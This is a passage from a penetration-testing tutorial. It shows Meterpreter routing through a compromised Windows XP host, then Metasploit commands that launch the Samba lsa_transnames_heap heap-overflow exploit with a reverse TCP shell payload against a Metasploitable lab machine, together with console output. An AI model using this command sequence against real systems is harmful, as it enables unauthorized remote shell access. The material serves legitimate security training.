90
Chapter 6
We have successfully compromised our Windows XP machine and have
full access to it. Next, we background our running session at and add a
route
command to the Framework at , telling it to route the remote net-
work ID over session 1, the background Meterpreter session. We then display
active routes with
route print
at , and we can clearly see at that, just as we
desired, the route is active.
Next, we’ll set up a second exploit against the targeted Linux system.
The specific exploit here is a Samba-based heap overflow, which would be
vulnerable on our Metasploitable machine.
use msf exploit(handler) >
use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) >
set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf exploit(lsa_transnames_heap) >
set LHOST 10.10.1.129
LHOST => 10.10.1.129
msf exploit(lsa_transnames_heap) >
set LPORT 8080
LPORT => 8080
msf exploit(lsa_transnames_heap) >
set RHOST 192.168.33.132
RHOST => 192.168.33.132
msf exploit(lsa_transnames_heap) >
ifconfig
[*] exec: ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:47:e6:79
inet addr:10.10.1.129 Bcast:10.10.1.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe47:e679/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:23656 errors:0 dropped:0 overruns:0 frame:0
TX packets:32321 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4272582 (4.2 MB) TX bytes:17849775 (17.8 MB)
Interrupt:19 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:600 errors:0 dropped:0 overruns:0 frame:0
TX packets:600 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:41386 (41.3 KB) TX bytes:41386 (41.3 KB)
msf exploit(lsa_transnames_heap) >
exploit
[*] Started reverse handler on 10.10.1.129:8080
[*] Creating nop sled....
[*] Trying to exploit Samba with address 0xffffe410...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.33.132[\lsarpc] ...
[*] Calling the vulnerable function...